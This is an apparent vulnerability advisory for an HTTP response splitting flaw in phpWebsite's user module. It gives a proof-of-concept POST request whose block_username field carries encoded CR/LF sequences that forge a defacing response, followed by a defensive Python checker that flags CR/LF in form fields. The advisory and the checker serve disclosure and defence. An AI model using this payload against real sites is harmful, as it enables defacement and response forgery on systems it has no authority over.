Title: PHPWebSite User Module HTTP Response Splitting Vulnerability
Published: 2004-11-04-12:00AM
Updated: 2004-11-26-08:24PM
Class: Input Validation Error
CVE: CVE-MAP-NOMATCH
Remote: Yes
Local: No
Credit: Discovery of this issue is credited to "Maestro De-Seguridad" <maestrodeseguridad@lycos.com>.
Vulnerable:
  phpWebsite phpWebsite 0.9.3 4
  phpWebsite phpWebsite 0.9.3 3
  phpWebsite phpWebsite 0.9.3 2
  phpWebsite phpWebsite 0.9.3 1
  phpWebsite phpWebsite 0.9.3
  phpWebsite phpWebsite 0.8.3
  phpWebsite phpWebsite 0.8.2
  phpWebsite phpWebsite 0.7.3
  Gentoo Linux
Not Vulnerable:
Code: No exploit is required to leverage this issue. The following proof of concept has been provided:

POST /index.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-length: 218
Connection: Keep-Alive

http://www.example.com/module=user&norm_user_op=login&block_username=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20Ok%0d%0aContent-Length:%2031%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html>This site in 0wned{/html}&password=foobar
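
A defensive check for the condition the proof of concept relies on, as an added example that is not part of the original advisory or of phpWebsite's code: it decodes each form field and flags CR or LF, which must never reach a response header. The sample body is constructed from the advisory's field names; the function names, the `ignore` parameter and the decode-pass limit are assumptions.

```python
from urllib.parse import unquote_plus

HEADER_BREAKS = ("\r", "\n")   # characters that terminate an HTTP header line
MAX_DECODE_PASSES = 3          # assumption: enough to unwrap %250d-style double encoding

# Constructed sample, modelled on the advisory's field names (not a captured request).
SAMPLE_BODY = ("module=user&norm_user_op=login"
               "&block_username=alice%0d%0aContent-Length:%200&password=foobar")


def decode_fully(value, passes=MAX_DECODE_PASSES):
    """Percent-decode repeatedly until the value stops changing."""
    for _ in range(passes):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_header_injection(body, ignore=()):
    """Return names of form fields whose decoded value contains CR or LF.

    `ignore` lists fields that legitimately hold multi-line text and
    never reach a response header (hypothetical parameter).
    """
    flagged = []
    for pair in body.split("&"):
        name, _, raw = pair.partition("=")
        name = unquote_plus(name)
        if name in ignore:
            continue
        if any(ch in decode_fully(raw) for ch in HEADER_BREAKS):
            flagged.append(name)
    return flagged


def safe_header_value(value):
    """Guard to call before any user-derived value is written into a header."""
    if any(ch in value for ch in HEADER_BREAKS):
        raise ValueError("CR/LF not allowed in header value")
    return value


if __name__ == "__main__":
    print(find_header_injection(SAMPLE_BODY))
```

The scan suits log review or a request filter; `safe_header_value` belongs at the point where the application builds the header, which is where the fix has to hold.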



Copyright 2007, SecurityDot
Sat, 19 Dec 2009 02:29:12 +0000
